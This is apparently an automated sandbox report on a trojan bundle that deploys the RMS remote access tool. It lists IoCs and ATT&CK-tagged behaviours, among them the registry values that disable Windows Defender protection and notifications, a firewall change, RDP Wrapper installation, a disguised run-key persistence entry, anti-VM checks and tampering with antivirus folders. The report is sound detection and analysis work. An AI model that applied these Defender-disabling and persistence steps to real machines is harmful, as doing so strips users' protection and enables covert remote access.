rms | d82d49e9ad153ef84670c1d0bde5f36b540d32fa037cca6127ce9e4e366b7403

Windows Service

Disable or Modify Tools

T1562.001

Processes:

Crack.exe

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	Crack.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"	Crack.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	Crack.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRawWriteNotification = "1"	Crack.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	Crack.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	Crack.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\RealtimeScanDirection = "2"	Crack.exe

Modifies Windows Defender notification settings 3 TTPs 2 IoCs

evasion trojan

Windows Service

Modify Registry

Disable or Modify Tools

T1562.001

Processes:

Crack.exe

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications	Crack.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1"	Crack.exe

RMS
Remote Manipulator System (RMS) is a remote access tool developed by Russian organization TektonIT.
trojan rat rms
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 6 IoCs

evasion

Query Registry

Virtualization/Sandbox Evasion

T1497

Processes:

unsecapp.exeunsecapp.exeSetup.exeCrack.exeupdate.exeIP.exe

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	unsecapp.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	unsecapp.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Setup.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Crack.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	update.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	IP.exe

Drops file in Drivers directory 1 IoCs

Processes:

update.exe

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	update.exe

Modifies Windows Firewall 2 TTPs 1 IoCs

evasion

Windows Service

Disable or Modify System Firewall

T1562.004

Processes:

netsh.exe

pid	Process
1708	netsh.exe

Sets DLL path for service in the registry 2 TTPs 1 IoCs

Registry Run Keys / Startup Folder

Modify Registry

Processes:

RDPWinst.exe

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters\ServiceDll = "%ProgramFiles%\\RDP Wrapper\\rdpwrap.dll"	RDPWinst.exe

Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Checks BIOS information in registry 2 TTPs 12 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

Processes:

Setup.exeunsecapp.exeunsecapp.exeCrack.exeupdate.exeIP.exe

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Setup.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Setup.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	unsecapp.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	unsecapp.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	unsecapp.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	unsecapp.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Crack.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Crack.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	update.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	update.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	IP.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	IP.exe

Checks computer location settings 2 TTPs 6 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

System Information Discovery

Processes:

install.exeupdate.exesvchost.exesmss.exewinserv.exewinserv.exe

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation	install.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation	update.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation	svchost.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation	smss.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation	winserv.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation	winserv.exe

Executes dropped EXE 14 IoCs

Processes:

SoftwareInstall.exeinstall.exeCrack.exeupdate.exewin.exesvchost.exeIP.exesmss.exewinserv.exewinserv.exeRDPWinst.exeunsecapp.exeunsecapp.exewinserv.exe

pid	Process
6360	SoftwareInstall.exe
6428	install.exe
6576	Crack.exe
6624	update.exe
5132	win.exe
7136	svchost.exe
5676	IP.exe
5484	smss.exe
4600	winserv.exe
5172	winserv.exe
5348	RDPWinst.exe
440	unsecapp.exe
7040	unsecapp.exe
6664	winserv.exe

Loads dropped DLL 1 IoCs

Processes:

svchost.exe

pid	Process
5372	svchost.exe

Modifies file permissions 1 TTPs 64 IoCs

discovery

File and Directory Permissions Modification

T1222

Processes:

icacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exe

pid	Process
6196	icacls.exe
1764	icacls.exe
3908	icacls.exe
7012	icacls.exe
3092	icacls.exe
6548	icacls.exe
3992	icacls.exe
5188	icacls.exe
5164	icacls.exe
6024	icacls.exe
5844	icacls.exe
6092	icacls.exe
5656	icacls.exe
4340	icacls.exe
1844	icacls.exe
6472	icacls.exe
5676	icacls.exe
4860	icacls.exe
5116	icacls.exe
6612	icacls.exe
6076	icacls.exe
6676	icacls.exe
724	icacls.exe
548	icacls.exe
5440	icacls.exe
3520	icacls.exe
5376	icacls.exe
6020	icacls.exe
4964	icacls.exe
5032	icacls.exe
4848	icacls.exe
6044	icacls.exe
5464	icacls.exe
1964	icacls.exe
1544	icacls.exe
6396	icacls.exe
852	icacls.exe
5876	icacls.exe
5508	icacls.exe
3792	icacls.exe
3400	icacls.exe
5976	icacls.exe
5044	icacls.exe
5780	icacls.exe
6344	icacls.exe
4904	icacls.exe
6728	icacls.exe
4612	icacls.exe
6816	icacls.exe
3696	icacls.exe
1216	icacls.exe
6864	icacls.exe
6572	icacls.exe
1088	icacls.exe
5416	icacls.exe
5932	icacls.exe
5272	icacls.exe
6076	icacls.exe
7036	icacls.exe
6232	icacls.exe
4232	icacls.exe
5504	icacls.exe
6508	icacls.exe
7120	icacls.exe

Themida packer 55 IoCs

Detects Themida, an advanced Windows software protection system.

themida

Processes:

resource	yara_rule
behavioral1/memory/6292-2480-0x00007FF7103E0000-0x00007FF71112B000-memory.dmp	themida
behavioral1/memory/6292-2484-0x00007FF7103E0000-0x00007FF71112B000-memory.dmp	themida
behavioral1/memory/6292-2483-0x00007FF7103E0000-0x00007FF71112B000-memory.dmp	themida
behavioral1/memory/6292-2481-0x00007FF7103E0000-0x00007FF71112B000-memory.dmp	themida
behavioral1/memory/6292-2482-0x00007FF7103E0000-0x00007FF71112B000-memory.dmp	themida
behavioral1/memory/6292-2485-0x00007FF7103E0000-0x00007FF71112B000-memory.dmp	themida
behavioral1/memory/6292-2486-0x00007FF7103E0000-0x00007FF71112B000-memory.dmp	themida
behavioral1/memory/6292-2487-0x00007FF7103E0000-0x00007FF71112B000-memory.dmp	themida
behavioral1/memory/6292-2497-0x00007FF7103E0000-0x00007FF71112B000-memory.dmp	themida
behavioral1/memory/6292-2505-0x00007FF7103E0000-0x00007FF71112B000-memory.dmp	themida
behavioral1/files/0x000300000001eb2d-2508.dat	themida
behavioral1/memory/6576-2523-0x00007FF71B5B0000-0x00007FF71C1EC000-memory.dmp	themida
behavioral1/memory/6576-2527-0x00007FF71B5B0000-0x00007FF71C1EC000-memory.dmp	themida
behavioral1/memory/6576-2530-0x00007FF71B5B0000-0x00007FF71C1EC000-memory.dmp	themida
behavioral1/memory/6576-2529-0x00007FF71B5B0000-0x00007FF71C1EC000-memory.dmp	themida
behavioral1/memory/6576-2528-0x00007FF71B5B0000-0x00007FF71C1EC000-memory.dmp	themida
behavioral1/memory/6576-2531-0x00007FF71B5B0000-0x00007FF71C1EC000-memory.dmp	themida
behavioral1/memory/6576-2532-0x00007FF71B5B0000-0x00007FF71C1EC000-memory.dmp	themida
behavioral1/memory/6576-2533-0x00007FF71B5B0000-0x00007FF71C1EC000-memory.dmp	themida
behavioral1/memory/6292-2535-0x00007FF7103E0000-0x00007FF71112B000-memory.dmp	themida
behavioral1/memory/6292-2538-0x00007FF7103E0000-0x00007FF71112B000-memory.dmp	themida
behavioral1/memory/6576-2537-0x00007FF71B5B0000-0x00007FF71C1EC000-memory.dmp	themida
behavioral1/memory/6624-2540-0x00007FF7AF8D0000-0x00007FF7B08D0000-memory.dmp	themida
behavioral1/memory/6292-2541-0x00007FF7103E0000-0x00007FF71112B000-memory.dmp	themida
behavioral1/memory/6624-2544-0x00007FF7AF8D0000-0x00007FF7B08D0000-memory.dmp	themida
behavioral1/memory/6624-2545-0x00007FF7AF8D0000-0x00007FF7B08D0000-memory.dmp	themida
behavioral1/memory/6624-2546-0x00007FF7AF8D0000-0x00007FF7B08D0000-memory.dmp	themida
behavioral1/memory/6624-2547-0x00007FF7AF8D0000-0x00007FF7B08D0000-memory.dmp	themida
behavioral1/memory/6624-2548-0x00007FF7AF8D0000-0x00007FF7B08D0000-memory.dmp	themida
behavioral1/memory/6624-2550-0x00007FF7AF8D0000-0x00007FF7B08D0000-memory.dmp	themida
behavioral1/memory/6292-2551-0x00007FF7103E0000-0x00007FF71112B000-memory.dmp	themida
behavioral1/memory/6624-2553-0x00007FF7AF8D0000-0x00007FF7B08D0000-memory.dmp	themida
behavioral1/memory/6292-2554-0x00007FF7103E0000-0x00007FF71112B000-memory.dmp	themida
behavioral1/memory/6624-2556-0x00007FF7AF8D0000-0x00007FF7B08D0000-memory.dmp	themida
behavioral1/memory/6292-2557-0x00007FF7103E0000-0x00007FF71112B000-memory.dmp	themida
behavioral1/memory/6624-2567-0x00007FF7AF8D0000-0x00007FF7B08D0000-memory.dmp	themida
behavioral1/memory/6292-2580-0x00007FF7103E0000-0x00007FF71112B000-memory.dmp	themida
behavioral1/memory/6624-2584-0x00007FF7AF8D0000-0x00007FF7B08D0000-memory.dmp	themida
behavioral1/memory/6292-2594-0x00007FF7103E0000-0x00007FF71112B000-memory.dmp	themida
behavioral1/files/0x0008000000023948-2601.dat	themida
behavioral1/memory/6624-2625-0x00007FF7AF8D0000-0x00007FF7B08D0000-memory.dmp	themida
behavioral1/memory/5676-2633-0x00007FF708590000-0x00007FF709FCE000-memory.dmp	themida
behavioral1/memory/5676-2632-0x00007FF708590000-0x00007FF709FCE000-memory.dmp	themida
behavioral1/memory/5676-2634-0x00007FF708590000-0x00007FF709FCE000-memory.dmp	themida
behavioral1/memory/5676-2635-0x00007FF708590000-0x00007FF709FCE000-memory.dmp	themida
behavioral1/memory/5676-2636-0x00007FF708590000-0x00007FF709FCE000-memory.dmp	themida
behavioral1/memory/5676-2637-0x00007FF708590000-0x00007FF709FCE000-memory.dmp	themida
behavioral1/memory/5676-2638-0x00007FF708590000-0x00007FF709FCE000-memory.dmp	themida
behavioral1/memory/6292-2641-0x00007FF7103E0000-0x00007FF71112B000-memory.dmp	themida
behavioral1/memory/6624-2643-0x00007FF7AF8D0000-0x00007FF7B08D0000-memory.dmp	themida
behavioral1/memory/5676-2644-0x00007FF708590000-0x00007FF709FCE000-memory.dmp	themida
behavioral1/files/0x000700000002396a-2677.dat	themida
behavioral1/memory/6292-2681-0x00007FF7103E0000-0x00007FF71112B000-memory.dmp	themida
behavioral1/memory/6624-2683-0x00007FF7AF8D0000-0x00007FF7B08D0000-memory.dmp	themida
behavioral1/memory/6292-2746-0x00007FF7103E0000-0x00007FF71112B000-memory.dmp	themida

Adds Run key to start application 2 TTPs 1 IoCs

Registry Run Keys / Startup Folder

Modify Registry

Processes:

IP.exe

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Realtek HD Audio = "C:\\ProgramData\\RealtekHD\\taskhostw.exe"	IP.exe

Checks whether UAC is enabled 1 TTPs 5 IoCs

evasion trojan

System Information Discovery

Processes:

unsecapp.exeunsecapp.exeCrack.exeupdate.exeIP.exe

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	unsecapp.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	unsecapp.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Crack.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	update.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	IP.exe

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow	ioc
160	ip-api.com

Modifies WinLogon 2 TTPs 1 IoCs

Winlogon Helper DLL

T1547.004

Modify Registry

Processes:

RDPWinst.exe

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AllowMultipleTSSessions = "1"	RDPWinst.exe

AutoIT Executable 46 IoCs

AutoIT scripts compiled to PE executables.

Processes:

resource	yara_rule
behavioral1/memory/6292-2484-0x00007FF7103E0000-0x00007FF71112B000-memory.dmp	autoit_exe
behavioral1/memory/6292-2483-0x00007FF7103E0000-0x00007FF71112B000-memory.dmp	autoit_exe
behavioral1/memory/6292-2482-0x00007FF7103E0000-0x00007FF71112B000-memory.dmp	autoit_exe
behavioral1/memory/6292-2485-0x00007FF7103E0000-0x00007FF71112B000-memory.dmp	autoit_exe
behavioral1/memory/6292-2486-0x00007FF7103E0000-0x00007FF71112B000-memory.dmp	autoit_exe
behavioral1/memory/6292-2487-0x00007FF7103E0000-0x00007FF71112B000-memory.dmp	autoit_exe
behavioral1/memory/6292-2497-0x00007FF7103E0000-0x00007FF71112B000-memory.dmp	autoit_exe
behavioral1/memory/6292-2505-0x00007FF7103E0000-0x00007FF71112B000-memory.dmp	autoit_exe
behavioral1/memory/6576-2530-0x00007FF71B5B0000-0x00007FF71C1EC000-memory.dmp	autoit_exe
behavioral1/memory/6576-2529-0x00007FF71B5B0000-0x00007FF71C1EC000-memory.dmp	autoit_exe
behavioral1/memory/6576-2528-0x00007FF71B5B0000-0x00007FF71C1EC000-memory.dmp	autoit_exe
behavioral1/memory/6576-2531-0x00007FF71B5B0000-0x00007FF71C1EC000-memory.dmp	autoit_exe
behavioral1/memory/6576-2532-0x00007FF71B5B0000-0x00007FF71C1EC000-memory.dmp	autoit_exe
behavioral1/memory/6576-2533-0x00007FF71B5B0000-0x00007FF71C1EC000-memory.dmp	autoit_exe
behavioral1/memory/6292-2535-0x00007FF7103E0000-0x00007FF71112B000-memory.dmp	autoit_exe
behavioral1/memory/6292-2538-0x00007FF7103E0000-0x00007FF71112B000-memory.dmp	autoit_exe
behavioral1/memory/6576-2537-0x00007FF71B5B0000-0x00007FF71C1EC000-memory.dmp	autoit_exe
behavioral1/memory/6292-2541-0x00007FF7103E0000-0x00007FF71112B000-memory.dmp	autoit_exe
behavioral1/memory/6624-2545-0x00007FF7AF8D0000-0x00007FF7B08D0000-memory.dmp	autoit_exe
behavioral1/memory/6624-2546-0x00007FF7AF8D0000-0x00007FF7B08D0000-memory.dmp	autoit_exe
behavioral1/memory/6624-2547-0x00007FF7AF8D0000-0x00007FF7B08D0000-memory.dmp	autoit_exe
behavioral1/memory/6624-2548-0x00007FF7AF8D0000-0x00007FF7B08D0000-memory.dmp	autoit_exe
behavioral1/memory/6624-2550-0x00007FF7AF8D0000-0x00007FF7B08D0000-memory.dmp	autoit_exe
behavioral1/memory/6292-2551-0x00007FF7103E0000-0x00007FF71112B000-memory.dmp	autoit_exe
behavioral1/memory/6624-2553-0x00007FF7AF8D0000-0x00007FF7B08D0000-memory.dmp	autoit_exe
behavioral1/memory/6292-2554-0x00007FF7103E0000-0x00007FF71112B000-memory.dmp	autoit_exe
behavioral1/memory/6624-2556-0x00007FF7AF8D0000-0x00007FF7B08D0000-memory.dmp	autoit_exe
behavioral1/memory/6292-2557-0x00007FF7103E0000-0x00007FF71112B000-memory.dmp	autoit_exe
behavioral1/memory/6624-2567-0x00007FF7AF8D0000-0x00007FF7B08D0000-memory.dmp	autoit_exe
behavioral1/memory/6292-2580-0x00007FF7103E0000-0x00007FF71112B000-memory.dmp	autoit_exe
behavioral1/memory/6624-2584-0x00007FF7AF8D0000-0x00007FF7B08D0000-memory.dmp	autoit_exe
behavioral1/memory/6292-2594-0x00007FF7103E0000-0x00007FF71112B000-memory.dmp	autoit_exe
behavioral1/files/0x0009000000023945-2610.dat	autoit_exe
behavioral1/memory/6624-2625-0x00007FF7AF8D0000-0x00007FF7B08D0000-memory.dmp	autoit_exe
behavioral1/memory/5676-2633-0x00007FF708590000-0x00007FF709FCE000-memory.dmp	autoit_exe
behavioral1/memory/5676-2634-0x00007FF708590000-0x00007FF709FCE000-memory.dmp	autoit_exe
behavioral1/memory/5676-2635-0x00007FF708590000-0x00007FF709FCE000-memory.dmp	autoit_exe
behavioral1/memory/5676-2636-0x00007FF708590000-0x00007FF709FCE000-memory.dmp	autoit_exe
behavioral1/memory/5676-2637-0x00007FF708590000-0x00007FF709FCE000-memory.dmp	autoit_exe
behavioral1/memory/5676-2638-0x00007FF708590000-0x00007FF709FCE000-memory.dmp	autoit_exe
behavioral1/memory/6292-2641-0x00007FF7103E0000-0x00007FF71112B000-memory.dmp	autoit_exe
behavioral1/memory/6624-2643-0x00007FF7AF8D0000-0x00007FF7B08D0000-memory.dmp	autoit_exe
behavioral1/memory/5676-2644-0x00007FF708590000-0x00007FF709FCE000-memory.dmp	autoit_exe
behavioral1/memory/6292-2681-0x00007FF7103E0000-0x00007FF71112B000-memory.dmp	autoit_exe
behavioral1/memory/6624-2683-0x00007FF7AF8D0000-0x00007FF7B08D0000-memory.dmp	autoit_exe
behavioral1/memory/6292-2746-0x00007FF7103E0000-0x00007FF71112B000-memory.dmp	autoit_exe

Drops file in System32 directory 3 IoCs

Processes:

RDPWinst.exeIP.exe

description	ioc	Process
File created	C:\Windows\System32\rfxvmt.dll	RDPWinst.exe
File created	C:\Windows\SysWOW64\unsecapp.exe	IP.exe
File opened for modification	C:\Windows\SysWOW64\unsecapp.exe	IP.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 6 IoCs

Processes:

Setup.exeCrack.exeupdate.exeIP.exeunsecapp.exeunsecapp.exe

pid	Process
6292	Setup.exe
6576	Crack.exe
6624	update.exe
5676	IP.exe
440	unsecapp.exe
7040	unsecapp.exe

Drops file in Program Files directory 52 IoCs

Processes:

update.exesmss.exeRDPWinst.exe

description	ioc	Process
File opened for modification	C:\Program Files\ESET	update.exe
File opened for modification	C:\Program Files\Transmission	update.exe
File opened for modification	C:\Program Files\Common Files\AV	update.exe
File opened for modification	C:\Program Files\Ravantivirus	update.exe
File opened for modification	C:\Program Files\COMODO	update.exe
File opened for modification	C:\Program Files\AVG	update.exe
File opened for modification	C:\Program Files\HitmanPro	update.exe
File opened for modification	C:\Program Files\Bitdefender Agent	update.exe
File opened for modification	C:\Program Files\EnigmaSoft	update.exe
File opened for modification	C:\Program Files\ByteFence	update.exe
File opened for modification	C:\Program Files\AVAST Software	update.exe
File opened for modification	C:\Program Files\CPUID\HWMonitor	update.exe
File opened for modification	C:\Program Files\RDP Wrapper\rdpwrap.ini	smss.exe
File created	C:\Program Files\RDP Wrapper\rdpwrap.ini	RDPWinst.exe
File created	C:\Program Files\RDP Wrapper\rdpwrap.dll	RDPWinst.exe
File opened for modification	C:\Program Files (x86)\AVAST Software	update.exe
File opened for modification	C:\Program Files (x86)\AVG	update.exe
File opened for modification	C:\Program Files\RDP Wrapper	smss.exe
File opened for modification	C:\Program Files (x86)\SpyHunter	update.exe
File opened for modification	C:\Program Files (x86)\Panda Security	update.exe
File opened for modification	C:\Program Files (x86)\MSI\MSI Center	update.exe
File opened for modification	C:\Program Files\QuickCPU	update.exe
File opened for modification	C:\Program Files\Kaspersky Lab	update.exe
File opened for modification	C:\Program Files\DrWeb	update.exe
File opened for modification	C:\Program Files\Rainmeter	update.exe
File opened for modification	C:\Program Files\Process Lasso	update.exe
File opened for modification	C:\Program Files (x86)\Microsoft JDX	update.exe
File opened for modification	C:\Program Files (x86)\GRIZZLY Antivirus	update.exe
File opened for modification	C:\Program Files\Loaris Trojan Remover	update.exe
File opened for modification	C:\Program Files (x86)\SpeedFan	update.exe
File opened for modification	C:\Program Files (x86)\GPU Temp	update.exe
File created	C:\Program Files\Common Files\System\iediagcmd.exe	update.exe
File opened for modification	C:\Program Files (x86)\Moo0	update.exe
File opened for modification	C:\Program Files\SpyHunter	update.exe
File opened for modification	C:\Program Files (x86)\Cezurity	update.exe
File opened for modification	C:\Program Files\NETGATE	update.exe
File opened for modification	C:\Program Files\ReasonLabs	update.exe
File opened for modification	C:\Program Files\Common Files\Doctor Web	update.exe
File opened for modification	C:\Program Files (x86)\IObit	update.exe
File opened for modification	C:\Program Files\Common Files\McAfee	update.exe
File opened for modification	C:\Program Files\Cezurity	update.exe
File opened for modification	C:\Program Files (x86)\IObit\Advanced SystemCare	update.exe
File opened for modification	C:\Program Files (x86)\IObit\IObit Malware Fighter	update.exe
File opened for modification	C:\Program Files\RogueKiller	update.exe
File opened for modification	C:\Program Files\Enigma Software Group	update.exe
File opened for modification	C:\Program Files\SUPERAntiSpyware	update.exe
File opened for modification	C:\Program Files (x86)\Wise	update.exe
File opened for modification	C:\Program Files (x86)\360	update.exe
File opened for modification	C:\Program Files\Malwarebytes	update.exe
File opened for modification	C:\Program Files (x86)\Kaspersky Lab	update.exe
File opened for modification	C:\Program Files (x86)\Transmission	update.exe
File opened for modification	C:\Program Files\Process Hacker 2	update.exe

Launches sc.exe 6 IoCs

Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exesc.exe

pid	Process
6332	sc.exe
5792	sc.exe
6756	sc.exe
6196	sc.exe
6984	sc.exe
5180	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Checks processor information in registry 2 TTPs 10 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

Processes:

smss.exefirefox.exefirefox.exe

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	smss.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	smss.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe

Creates scheduled task(s) 1 TTPs 8 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

Scheduled Task/Job

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid	Process
6732	schtasks.exe
1812	schtasks.exe
5388	schtasks.exe
5340	schtasks.exe
1572	schtasks.exe
6936	schtasks.exe
5608	schtasks.exe
6644	schtasks.exe

Delays execution with timeout.exe 2 IoCs

evasion

Processes:

timeout.exetimeout.exe

pid	Process
5560	timeout.exe
564	timeout.exe

Modifies data under HKEY_USERS 1 IoCs

Processes:

SoftwareInstall.exe

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Control Panel\International	SoftwareInstall.exe

Modifies registry class 4 IoCs

Processes:

firefox.exesmss.exe

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings	firefox.exe
Key created	\REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\MIME\Database	smss.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Charset	smss.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Codepage	smss.exe

NTFS ADS 4 IoCs

Processes:

IP.exesmss.exefirefox.exe

description	ioc	Process
File opened for modification	C:\ProgramData\Setup\winmgmts:\	IP.exe
File opened for modification	C:\ProgramData\Setup\winmgmts:\	smss.exe
File opened for modification	C:\ProgramData\Setup\WinMgmts:\	IP.exe
File created	C:\Users\Admin\Downloads\john.zip:Zone.Identifier	firefox.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

Setup.exeupdate.exewinserv.exeIP.exe

pid	Process
6292	Setup.exe
6292	Setup.exe
6292	Setup.exe
6292	Setup.exe
6292	Setup.exe
6292	Setup.exe
6292	Setup.exe
6292	Setup.exe
6292	Setup.exe
6292	Setup.exe
6292	Setup.exe
6292	Setup.exe
6292	Setup.exe
6292	Setup.exe
6292	Setup.exe
6292	Setup.exe
6292	Setup.exe
6292	Setup.exe
6292	Setup.exe
6292	Setup.exe
6292	Setup.exe
6292	Setup.exe
6292	Setup.exe
6292	Setup.exe
6292	Setup.exe
6292	Setup.exe
6292	Setup.exe
6292	Setup.exe
6292	Setup.exe
6292	Setup.exe
6292	Setup.exe
6292	Setup.exe
6292	Setup.exe
6292	Setup.exe
6292	Setup.exe
6292	Setup.exe
6292	Setup.exe
6292	Setup.exe
6292	Setup.exe
6292	Setup.exe
6292	Setup.exe
6292	Setup.exe
6292	Setup.exe
6292	Setup.exe
6292	Setup.exe
6292	Setup.exe
6624	update.exe
6624	update.exe
6624	update.exe
6624	update.exe
6624	update.exe
6624	update.exe
6624	update.exe
6624	update.exe
4600	winserv.exe
4600	winserv.exe
4600	winserv.exe
4600	winserv.exe
4600	winserv.exe
4600	winserv.exe
5676	IP.exe
5676	IP.exe
5676	IP.exe
5676	IP.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

unsecapp.exe

pid	Process
440	unsecapp.exe

Suspicious behavior: LoadsDriver 1 IoCs

Processes:

pid	Process
664

Suspicious use of AdjustPrivilegeToken 12 IoCs

Processes:

firefox.exewinserv.exewinserv.exeRDPWinst.exesvchost.exe

description	pid	Process
Token: SeDebugPrivilege	2940	firefox.exe
Token: SeDebugPrivilege	2940	firefox.exe
Token: SeDebugPrivilege	2940	firefox.exe
Token: SeDebugPrivilege	2940	firefox.exe
Token: SeDebugPrivilege	2940	firefox.exe
Token: SeDebugPrivilege	2940	firefox.exe
